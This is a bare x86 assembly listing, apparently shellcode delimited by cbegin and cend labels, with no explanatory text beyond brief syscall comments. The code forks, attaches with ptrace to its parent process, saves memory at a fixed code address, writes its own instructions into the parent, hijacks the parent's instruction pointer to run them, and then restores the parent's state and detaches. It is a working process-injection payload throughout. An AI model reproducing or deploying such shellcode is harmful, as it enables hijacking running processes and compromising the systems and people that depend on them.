1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
|
.globl cbegin
.globl cend
cbegin:
/* getppid */
pushl $64
popl %eax
int $0x80
/* movl %eax, %ecx */
pushl %eax
xchgl %ebp, %eax
/* z_fork */
pushl $2
popl %eax
int $0x80
or %eax, %eax
je fchild
/* waitpid (pid, NULL, 0) */
pushl $7
popl %esi
xchgl %esi, %eax /* eax = 7, esi = ppid */
xorl %ecx, %ecx
xorl %edx, %edx
int $0x80
xorl %eax, %eax
movb $162, %al
pushl $10
pushl $10
movl %esp, %ebx
movl %esp, %ecx
int $0x80
ui:
jmp ui
/* exit */
fexit:
pushl $1
popl %eax
xorl %ebx, %ebx
int $0x80
/*** CHILD ***/
fchild: pushl $2 /* second fork */
popl %eax
int $0x80
or %eax, %eax
jne fexit
popl %ecx /* parent process pid */
/* ptrace attach */
pushl $26
popl %eax
cdq
pushl $16
popl %ebx
xorl %esi, %esi
int $0x80
/* ptrace peekdata */
movl $0x08048210, %edx
/* movl $0xbf7ff010, %edx */
movl $0xbffff010, %esi
pushl $127
popl %edi
loopa:
movl %ebp, %ecx
pushl $26
popl %eax
pushl $2
popl %ebx
pushl %edi
int $0x80
popl %edi
incl %edx
incl %esi
decl %edi
jnz loopa
/* ptrace getregs */
movl %ebp, %ecx
pushl $26
popl %eax
pushl $12
popl %ebx
pusha
movl %esp, %esi
int $0x80
/* ptrace setregs */
movl %ebp, %ecx
pushl $26
popl %eax
pushl $13
popl %ebx
movl %esp, %esi
movl 48(%esi), %edi
pushl %edi
movl $0x08048210, 48(%esi)
/* movl $0xbf7ff010, 48(%esi)*/
int $0x80
jmp pointX
pointY:
popl %esi
movl $0x08048210, %edx
pushl $20
popl %edi
loopc:
movl %ebp, %ecx
pushl $26
popl %eax
pushl $5
popl %ebx
pushl %edi
pushl %esi
movl (%esi), %esi
int $0x80
popl %esi
popl %edi
incl %edx
incl %esi
decl %edi
jnz loopc
/* ptrace pokedata */
/* movl %ebp, %ecx
pushl $26
popl %eax
pushl $5
popl %ebx
movl $0xccccfeeb, %esi*/
/* movl $0xbf7ff010, %edx*/
movl $0x08048210, %edx
/* int $0x80*/
/*ptrace cont */
movl %ebp, %ecx
pushl $26
popl %eax
cdq
pushl $7
popl %ebx
xorl %esi, %esi
int $0x80
/* wait 4 */
/* 0 on return */
cdq
movl %eax, %ebx
decl %ebx
movl %eax, %ecx
movb $114, %al
int $0x80
/* ptrace pokedata */
movl $0x08048210, %edx
movl $0xbffff010, %esi
/* movl $0xbf7ff010, %edx*/
pushl $127
popl %edi
loopb:
movl %ebp, %ecx
pushl $26
popl %eax
pushl $5
popl %ebx
pushl %edi
pushl %esi
movl (%esi), %esi
int $0x80
popl %esi
popl %edi
incl %edx
incl %esi
decl %edi
jnz loopb
/* ptrace setregs */
popl %edi
movl %ebp, %ecx
pushl $26
popl %eax
pushl $13
popl %ebx
movl %esp, %esi
movl %edi, 48(%esi)
int $0x80
/* ptrace detach */
movl %ebp, %ecx
pushl $17
popl %ebx
pushl $26
popl %eax
cdq
movl %edx, %esi
int $0x80
/* exit */
xorl %ecx, %ecx
incl %esi
xchgl %esi, %eax
int $0x80
pointX:
call pointY
pushl $2 /* second fork */
popl %eax
int $0x80
or %eax, %eax
je pointA
int $0x3
pointA:
jmp pointA
cend:
|
